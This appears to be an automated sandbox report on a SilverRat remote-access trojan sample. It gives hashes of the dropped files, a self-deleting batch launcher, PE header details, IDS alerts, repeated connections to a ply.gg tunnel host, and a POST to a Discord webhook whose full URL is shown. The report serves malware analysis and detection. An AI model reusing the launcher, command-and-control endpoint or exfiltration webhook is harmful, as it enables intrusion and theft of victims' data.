                                                    MD5:6442F277E58B3984BA5EEE0C15C0C6AD
                                                    SHA1:5343ADC2E7F102EC8FB6A101508730898CB14F57
                                                    SHA-256:36B765624FCA82C57E4C5D3706FBD81B5419F18FC3DD7B77CD185E6E3483382D
                                                    SHA-512:F9E62F510D5FB788F40EBA13287C282444607D2E0033D2233BC6C39CA3E1F5903B65A07F85FA0942BEDDCE2458861073772ACA06F291FA68F23C765B0CA5CA17
                                                    Malicious:false
                                                    Preview:@...e................................................@..........

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_miisklbp.vgt.psm1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oly2dpkt.ovt.ps1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sgcigazp.qlo.psm1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vazok04i.bjj.ps1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\tmp4B52.tmp.bat

                                                    Download File
                                                    Process:C:\Users\user\Desktop\RLesaPFXew.exe
                                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):146
                                                    Entropy (8bit):5.145770793928967
                                                    Encrypted:false
                                                    SSDEEP:3:mKDDCMNqTtvL5oNJP8vLVymqRDN+E2J5xAInTRI7IRwZPy:hWKqTtT6N9AVymq1N723fTjwk
                                                    MD5:6F8CAF439906CE0F9490B75D3579C565
                                                    SHA1:29D1F5C769B57D5EA2948398B5BE03A8A920B8E9
                                                    SHA-256:2BC641B78D95FB5AEC8C54AF65A850C0CD4538021F999CA6F8A6DCE0B5E1723B
                                                    SHA-512:6E592623278D31FD36DBACE84B475720BE04D21BF24978B1D477E70E7ABED6C3163615937CEFBE7ED12DCEE1EFACF8EA70B572BC9C62CCE61B3C962B241699DC
                                                    Malicious:false
                                                    Preview:@echo off..timeout 3 > NUL..START "" "C:\Users\user\java\$77java.exe"..CD C:\Users\user\AppData\Local\Temp\..DEL "tmp4B52.tmp.bat" /f /q..

                                                    C:\Users\user\java\$77java.exe

                                                    Download File
                                                    Process:C:\Users\user\Desktop\RLesaPFXew.exe
                                                    File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):46592
                                                    Entropy (8bit):5.5548499971388345
                                                    Encrypted:false
                                                    SSDEEP:768:6lAB2vEsZq7tAXoHCs+QhkSFp4XdtAy9ex42RULe9PlKbo0B6SDZJvrAV89v8:6lAB2viIs+sUdtAy9o42GK9z0oOZJsVD
                                                    MD5:537B270C2278044E4C3958530F745ECE
                                                    SHA1:AA80B2971F14C91C4A09162357188BF73D0F9934
                                                    SHA-256:3147922611475A9C92E23A018BF666A4890F2C3AA159B235883BEFF80CFFB71A
                                                    SHA-512:86730243F2AA11CD2D6C63CF91D412819060D7DCF8AA50CDB82190E2407F7F8910549233AC99AD7BA844691E50DE70720B3608F299450406D23F41AA85196881
                                                    Malicious:true
                                                    Yara Hits:
                                                    • Rule: JoeSecurity_SilverRat, Description: Yara detected SilverRat, Source: C:\Users\user\java\$77java.exe, Author: Joe Security
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 66%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....`/g.........."...................... .....@..... ....................................@...@......@............... ............................................................................................................................... ..H............text...(.... ...................... ..`.rsrc...............................@..@.reloc..............................@..BH........[..Lp...................................................................(s...*..0..........(....-..(....(....-..(....(....+. ....(......&..(....,.(&...(....(....s......r...po.....r...pr...p(....o....o......o......o.....(....&..&..(X...(......&..~....-........s.........~....s....(......&..(D...-.(O...(L.....&..~....(....(....+.....@....!..-........F.B.......................).....................(....*.0..........( ...~....(!...o"........~....(!...s#........( ...~....(!...(...

                                                    \Device\Null

                                                    Download File
                                                    Process:C:\Windows\System32\timeout.exe
                                                    File Type:ASCII text, with CRLF line terminators, with overstriking
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.41440934524794
                                                    Encrypted:false
                                                    SSDEEP:3:hYFqdLGAR+mQRKVxLZXt0sn:hYFqGaNZKsn
                                                    MD5:3DD7DD37C304E70A7316FE43B69F421F
                                                    SHA1:A3754CFC33E9CA729444A95E95BCB53384CB51E4
                                                    SHA-256:4FA27CE1D904EA973430ADC99062DCF4BAB386A19AB0F8D9A4185FA99067F3AA
                                                    SHA-512:713533E973CF0FD359AC7DB22B1399392C86D9FD1E715248F5724AAFBBF0EEB5EAC0289A0E892167EB559BE976C2AD0A0A0D8EFC407FFAF5B3C3A32AA9A0AAA4
                                                    Malicious:false
                                                    Preview:..Waiting for 3 seconds, press a key to continue ....2.1.0..

                                                    Static File Info

                                                    General

                                                    File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                    Entropy (8bit):5.5548499971388345
                                                    TrID:
                                                    • Win64 Executable GUI Net Framework (217006/5) 49.88%
                                                    • Win64 Executable GUI (202006/5) 46.43%
                                                    • Win64 Executable (generic) (12005/4) 2.76%
                                                    • Generic Win/DOS Executable (2004/3) 0.46%
                                                    • DOS Executable Generic (2002/1) 0.46%
                                                    File name:RLesaPFXew.exe
                                                    File size:46'592 bytes
                                                    MD5:537b270c2278044e4c3958530f745ece
                                                    SHA1:aa80b2971f14c91c4a09162357188bf73d0f9934
                                                    SHA256:3147922611475a9c92e23a018bf666a4890f2c3aa159b235883beff80cffb71a
                                                    SHA512:86730243f2aa11cd2d6c63cf91d412819060d7dcf8aa50cdb82190e2407f7f8910549233ac99ad7ba844691e50de70720b3608f299450406d23f41aa85196881
                                                    SSDEEP:768:6lAB2vEsZq7tAXoHCs+QhkSFp4XdtAy9ex42RULe9PlKbo0B6SDZJvrAV89v8:6lAB2viIs+sUdtAy9o42GK9z0oOZJsVD
                                                    TLSH:B5234B002BD9863AD6FE4B789DF1025586B9F2635613EB8F2CC442EB0A277C589417F6
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....`/g.........."...................... .....@..... ....................................@...@......@............... .....

                                                    File Icon

                                                    Icon Hash:00928e8e8686b000

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0x140000000
                                                    Entrypoint Section:
                                                    Digitally signed:false
                                                    Imagebase:0x140000000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x672F60EC [Sat Nov 9 13:17:32 2024 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:

                                                    Entrypoint Preview

                                                    Instruction
                                                    dec ebp
                                                    pop edx
                                                    nop
                                                    add byte ptr [ebx], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax+eax], al
                                                    add byte ptr [eax], al

                                                    Data Directories

                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xe0000x4e8.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                    Sections

                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    .text0x20000xac280xae00fc1a9bff867d9fcc8a8f8755673ab180False0.5026266163793104data5.619968921371862IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                    .rsrc0xe0000x4e80x600f760aadd519b50cc1362e9f9f75616a8False0.3756510416666667data3.7337887615215917IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                    Resources

                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                    RT_VERSION0xe0a00x254data0.45805369127516776
                                                    RT_MANIFEST0xe2f80x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                                    Network Behavior

                                                    Suricata IDS Alerts

                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                    2024-11-09T22:53:23.175080+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow152.149.20.212443192.168.2.649745TCP
                                                    2024-11-09T22:53:50.697780+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow152.149.20.212443192.168.2.660572TCP

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Nov 9, 2024 22:53:11.859798908 CET49710443192.168.2.6162.159.133.233
                                                    Nov 9, 2024 22:53:11.859850883 CET44349710162.159.133.233192.168.2.6
                                                    Nov 9, 2024 22:53:11.859913111 CET49710443192.168.2.6162.159.133.233
                                                    Nov 9, 2024 22:53:11.871438026 CET49710443192.168.2.6162.159.133.233
                                                    Nov 9, 2024 22:53:11.871454000 CET44349710162.159.133.233192.168.2.6
                                                    Nov 9, 2024 22:53:12.488956928 CET44349710162.159.133.233192.168.2.6
                                                    Nov 9, 2024 22:53:12.489022970 CET49710443192.168.2.6162.159.133.233
                                                    Nov 9, 2024 22:53:12.491710901 CET49710443192.168.2.6162.159.133.233
                                                    Nov 9, 2024 22:53:12.491719007 CET44349710162.159.133.233192.168.2.6
                                                    Nov 9, 2024 22:53:12.492117882 CET44349710162.159.133.233192.168.2.6
                                                    Nov 9, 2024 22:53:12.529386997 CET49710443192.168.2.6162.159.133.233
                                                    Nov 9, 2024 22:53:12.575335979 CET44349710162.159.133.233192.168.2.6
                                                    Nov 9, 2024 22:53:12.654032946 CET44349710162.159.133.233192.168.2.6
                                                    Nov 9, 2024 22:53:12.654521942 CET49710443192.168.2.6162.159.133.233
                                                    Nov 9, 2024 22:53:12.654535055 CET44349710162.159.133.233192.168.2.6
                                                    Nov 9, 2024 22:53:12.864989996 CET44349710162.159.133.233192.168.2.6
                                                    Nov 9, 2024 22:53:12.865133047 CET44349710162.159.133.233192.168.2.6
                                                    Nov 9, 2024 22:53:12.865629911 CET49710443192.168.2.6162.159.133.233
                                                    Nov 9, 2024 22:53:12.867834091 CET49710443192.168.2.6162.159.133.233
                                                    Nov 9, 2024 22:53:12.919152975 CET4971152996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:53:12.925348997 CET5299649711147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:53:12.925422907 CET4971152996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:53:12.926789999 CET4971152996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:53:12.932646036 CET5299649711147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:53:21.415589094 CET5299649711147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:53:21.415678978 CET4971152996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:53:21.435461044 CET4971152996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:53:21.436254978 CET4974452996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:53:21.440318108 CET5299649711147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:53:21.441199064 CET5299649744147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:53:21.441266060 CET4974452996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:53:21.441478014 CET4974452996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:53:21.446201086 CET5299649744147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:53:29.927369118 CET5299649744147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:53:29.927434921 CET4974452996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:53:29.936026096 CET4974452996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:53:29.937568903 CET4979652996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:53:29.940861940 CET5299649744147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:53:29.942419052 CET5299649796147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:53:29.942497969 CET4979652996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:53:29.948149920 CET4979652996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:53:29.953193903 CET5299649796147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:53:38.426225901 CET5299649796147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:53:38.426304102 CET4979652996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:53:38.435703993 CET4979652996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:53:38.436532021 CET4984652996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:53:38.440502882 CET5299649796147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:53:38.441293955 CET5299649846147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:53:38.441374063 CET4984652996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:53:38.441663980 CET4984652996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:53:38.446433067 CET5299649846147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:53:46.941847086 CET5299649846147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:53:46.941926003 CET4984652996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:53:46.951225996 CET4984652996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:53:46.952044964 CET4989552996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:53:46.955943108 CET5299649846147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:53:46.956789017 CET5299649895147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:53:46.956859112 CET4989552996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:53:46.957066059 CET4989552996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:53:46.961765051 CET5299649895147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:53:55.437702894 CET5299649895147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:53:55.437894106 CET4989552996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:53:55.451294899 CET4989552996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:53:55.452280045 CET6060752996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:53:55.456650019 CET5299649895147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:53:55.458070993 CET5299660607147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:53:55.458136082 CET6060752996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:53:55.458353043 CET6060752996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:53:55.463052988 CET5299660607147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:54:03.959096909 CET5299660607147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:54:03.959160089 CET6060752996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:54:03.967592955 CET6060752996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:54:03.968588114 CET6065352996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:54:03.972397089 CET5299660607147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:54:03.973416090 CET5299660653147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:54:03.973474979 CET6065352996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:54:03.973711014 CET6065352996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:54:03.978511095 CET5299660653147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:54:12.458875895 CET5299660653147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:54:12.458940983 CET6065352996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:54:12.467040062 CET6065352996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:54:12.468058109 CET6065452996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:54:12.471813917 CET5299660653147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:54:12.472872019 CET5299660654147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:54:12.472949982 CET6065452996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:54:12.473207951 CET6065452996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:54:12.478013992 CET5299660654147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:54:20.977060080 CET5299660654147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:54:20.977197886 CET6065452996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:54:20.982736111 CET6065452996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:54:20.983802080 CET6065652996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:54:20.987524033 CET5299660654147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:54:20.988616943 CET5299660656147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:54:20.988683939 CET6065652996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:54:20.988922119 CET6065652996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:54:20.993762016 CET5299660656147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:54:29.469165087 CET5299660656147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:54:29.469237089 CET6065652996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:54:29.482856035 CET6065652996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:54:29.483941078 CET6065852996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:54:29.488140106 CET5299660656147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:54:29.490359068 CET5299660658147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:54:29.490461111 CET6065852996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:54:29.494554996 CET6065852996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:54:29.499610901 CET5299660658147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:54:37.975286007 CET5299660658147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:54:37.975403070 CET6065852996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:54:37.982820988 CET6065852996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:54:37.983861923 CET6065952996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:54:37.988569975 CET5299660658147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:54:37.989675045 CET5299660659147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:54:37.989748955 CET6065952996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:54:37.990014076 CET6065952996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:54:37.995841026 CET5299660659147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:54:46.494982004 CET5299660659147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:54:46.495155096 CET6065952996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:54:46.514100075 CET6065952996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:54:46.514834881 CET6066152996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:54:46.519066095 CET5299660659147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:54:46.519609928 CET5299660661147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:54:46.519773006 CET6066152996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:54:46.520029068 CET6066152996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:54:46.525074005 CET5299660661147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:54:55.018409967 CET5299660661147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:54:55.018503904 CET6066152996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:54:55.029967070 CET6066152996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:54:55.031124115 CET6066252996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:54:55.034796953 CET5299660661147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:54:55.035959959 CET5299660662147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:54:55.036032915 CET6066252996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:54:55.036293983 CET6066252996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:54:55.041069031 CET5299660662147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:55:03.543710947 CET5299660662147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:55:03.543836117 CET6066252996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:55:03.596707106 CET6066252996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:55:03.600910902 CET6066352996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:55:03.601502895 CET5299660662147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:55:03.605804920 CET5299660663147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:55:03.605875969 CET6066352996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:55:03.609133959 CET6066352996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:55:03.614006996 CET5299660663147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:55:12.081427097 CET5299660663147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:55:12.081532001 CET6066352996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:55:12.092396975 CET6066352996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:55:12.093103886 CET6066552996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:55:12.097259998 CET5299660663147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:55:12.097898960 CET5299660665147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:55:12.097975016 CET6066552996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:55:12.098181963 CET6066552996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:55:12.102968931 CET5299660665147.185.221.23192.168.2.6

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Nov 9, 2024 22:53:11.840869904 CET5043253192.168.2.61.1.1.1
                                                    Nov 9, 2024 22:53:11.847824097 CET53504321.1.1.1192.168.2.6
                                                    Nov 9, 2024 22:53:12.885133982 CET5081553192.168.2.61.1.1.1
                                                    Nov 9, 2024 22:53:12.917999983 CET53508151.1.1.1192.168.2.6
                                                    Nov 9, 2024 22:53:48.584686995 CET5364297162.159.36.2192.168.2.6
                                                    Nov 9, 2024 22:53:49.345084906 CET53586091.1.1.1192.168.2.6

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Nov 9, 2024 22:53:11.840869904 CET192.168.2.61.1.1.10x8af2Standard query (0)discordapp.comA (IP address)IN (0x0001)false
                                                    Nov 9, 2024 22:53:12.885133982 CET192.168.2.61.1.1.10x6a5bStandard query (0)23.ip.gl.ply.ggA (IP address)IN (0x0001)false

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Nov 9, 2024 22:53:11.847824097 CET1.1.1.1192.168.2.60x8af2No error (0)discordapp.com162.159.133.233A (IP address)IN (0x0001)false
                                                    Nov 9, 2024 22:53:11.847824097 CET1.1.1.1192.168.2.60x8af2No error (0)discordapp.com162.159.134.233A (IP address)IN (0x0001)false
                                                    Nov 9, 2024 22:53:11.847824097 CET1.1.1.1192.168.2.60x8af2No error (0)discordapp.com162.159.130.233A (IP address)IN (0x0001)false
                                                    Nov 9, 2024 22:53:11.847824097 CET1.1.1.1192.168.2.60x8af2No error (0)discordapp.com162.159.129.233A (IP address)IN (0x0001)false
                                                    Nov 9, 2024 22:53:11.847824097 CET1.1.1.1192.168.2.60x8af2No error (0)discordapp.com162.159.135.233A (IP address)IN (0x0001)false
                                                    Nov 9, 2024 22:53:12.917999983 CET1.1.1.1192.168.2.60x6a5bNo error (0)23.ip.gl.ply.gg147.185.221.23A (IP address)IN (0x0001)false

                                                    HTTP Request Dependency Graph

                                                    • discordapp.com

                                                    HTTPS Proxied Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.649710162.159.133.2334432940C:\Users\user\java\$77java.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-09 21:53:12 UTC258OUTPOST /api/webhooks/1294921166322139216/xs9PPlodeSrCXniTlxP1AWYgIlBu-KYxj9_7pK95qOS4ZhheXZuWsNfenaXEjnMgG__0 HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: discordapp.com
                                                    Content-Length: 415
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    2024-11-09 21:53:12 UTC25INHTTP/1.1 100 Continue
